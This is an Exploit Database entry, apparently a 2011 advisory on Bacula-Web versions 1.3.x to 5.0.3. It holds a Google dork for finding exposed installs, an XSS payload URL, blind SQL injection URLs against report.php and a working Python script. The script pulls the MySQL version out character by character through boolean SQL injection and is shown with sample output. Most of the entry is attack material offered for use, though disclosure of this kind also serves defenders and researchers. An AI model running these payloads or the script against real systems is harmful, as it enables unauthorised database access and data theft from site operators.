Bacula-Web 1.3.x < 5.0.3 - Multiple Vulnerabilities

• Exploit Database
• 40 阅读

• 作者： b0telh0
  日期： 2011-03-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/16935/

• GotGeek Labs
  http://www.gotgeek.com.br/
  
  Bacula-web 1.3.x - 5.0.3 Multiple Remote Vulnerabilities
  
  
  
  [+] Description
  
  Bacula-Web is a web based tool that provide you a summarized
  view of your bacula director.
  It obtain his information from your bacula catalog's database.
  It provide some usefull informations such as:
  * Last 24 hours jobs status (completed, failed, waiting, etc.)
  * Medias and Pool usage
  * Last 7 days storage usage
  
  The main advantages of this tool are
  * it's web based, so you can reach it simply through your
  preferred browser from anywhere
  * it's pretty easy to install (you just need a LAMP server with
  a valid Bacula catalog database connection)
  * it contain a lot of information into a single page (have a
  look on your last jobs for example)
  
  This is a fairly high level Bacula management tool.
  
  
  
  [+] Information
  
  Title: Bacula-web 1.3.x - 5.0.3 Multiple Remote Vulnerabilities
  Google Dork: intitle:bacula-web "Status"
  Advisory: gg-004-2011
  Date: 02-22-2011
  Last update: 03-04-2011
  Link: http://www.gotgeek.com.br/pocs/gg-004-2011.txt
  Tested on: FreeBSD 7.2-RELEASE + MySQL 5.x
  
  
  
  [+] Vulnerabilities
  
  Cross-site Scripting:
  Bacula-web is affected by cross-site scripting vulnerability because
  it fails to properly sanitize user-supplied input.
  An attacker may leverage this issue to execute arbitrary script code
  in the browser of an unsuspecting user in the context of the affected site.
  
  XSS:
  http://target/bacula/report.php?default=1&server=Backup_inc<script>alert("xss")</script>
  
  Blind SQL Injection:
  Bacula-web is also affected by blind SQL injection vulnerability because it fails
  to sufficiently sanitize user-supplied data before using it in an SQL query.
  Exploiting these issues could allow an attacker to compromise the
  application, access or modify data, or exploit latent vulnerabilities
  in the underlying database.
  
  *Blind SQLi:
  http://target/bacula/report.php?default=1&server=Backup_inc' and 1='2	#FALSE
  http://target/bacula/report.php?default=1&server=Backup_inc' and 1='1	#TRUE
  
  *Need a valid job name at server variable with some data to get false or true page.
  
  
  Affected Versions:
  (1)Bacula-web 5.0.3
  (2)Bacula-web 1.38.9_1 (FreeBSD)
  
  Other versions may also be vulnerable.
  
  
  
  [+] Proof of Concept/Exploit
  
  # $ python bacula-web.py -t 10.1.1.1 -d /bacula/ -j Backup_inc -p 80
  #
  # [*] gotgeek labs
  # [*] http://gotgeek.com.br
  #
  #
  # [*] Checking report.php...
  # [+] Found!
  # [*] Let's get MySQL version.. Wait a moment...
  # [+] MySQL: 5.0.84
  #
  # [*]Done!
  
  
  #!/usr/bin/python
  #
  
  import sys
  import httplib, socket
  import urllib, re
  from optparse import OptionParser
  
  # You may also use "MB".. Check your target before!
  truestr = "GB"
  usage = "./%prog -t <target> -d <dir> -j <job> -p <port>\n"
  usage+= "Example: ./%prog -t www.example.com -d /bacula-web/ -j BackupCatalog -p 80"
  
  parser = OptionParser(usage=usage)
  parser.add_option("-t", action="store", dest="target",
  help="target server")
  parser.add_option("-d", action="store", dest="dir",
  help="path to bacula-web")
  parser.add_option("-j", action="store", dest="job",
  help="bacula job name")
  parser.add_option("-p", action="store", dest="port",
  help="server port")
  (options, args) = parser.parse_args()
  
  def banner():
  print "\n[*] gotgeek labs"
  print "[*] http://gotgeek.com.br\n\n"
  
  if len(sys.argv) < 5:
  banner()
  parser.print_help()
  sys.exit(1)
  
  
  def checkurl():
  try:
  print "[*] Checking report.php..."
  conn = httplib.HTTPConnection(options.target+":"+options.port)
  conn.request("GET", options.dir + "report.php")
  r1 = conn.getresponse()
  if r1.status == 200:
  print "[+] Found!"
  else:
  print "[-] NOT Found!\n\n"
  sys.exit(1)
  except socket.error, msg:
  print "[-] Can't connect to the target!\n\n"
  sys.exit(1)
  
  
  def geturl(sqli):
  try:
  check = urllib.urlopen("http://"+options.target+":"+options.port+options.dir+sqli).read()
  except:
  print "[-] Can't connect to the target!\n\n"
  sys.exit(1)
  return check
  
  
  def getmysql(gg):
  for i in range(43,58):
  request = ("report.php?default=1&server="+options.job+"'%20and%20ascii(substring(@@version,"+str(gg)+",1))='"+str(i))
  result = geturl(request)
  if re.search(truestr,result):
  gg = gg+1
  sys.stdout.write(chr(i))
  sys.stdout.flush()
  getmysql(gg)
  break
  
  
  
  def main():
  gg = 1
  banner()
  checkurl()
  print "[*] Let's get MySQL version.. Wait a moment..."
  sys.stdout.write("[+] MySQL: ")
  getmysql(gg)
  print "\n\n[*]Done!\n\n"
  
  if __name__ == "__main__":
  main()
  
  
  
  [+] References
  
  (1)http://bacula-web.dflc.ch/index.php/home.html
  (2)http://www.freshports.org/www/bacula-web/
  
  
  
  [+] Credits
  
  b0telh0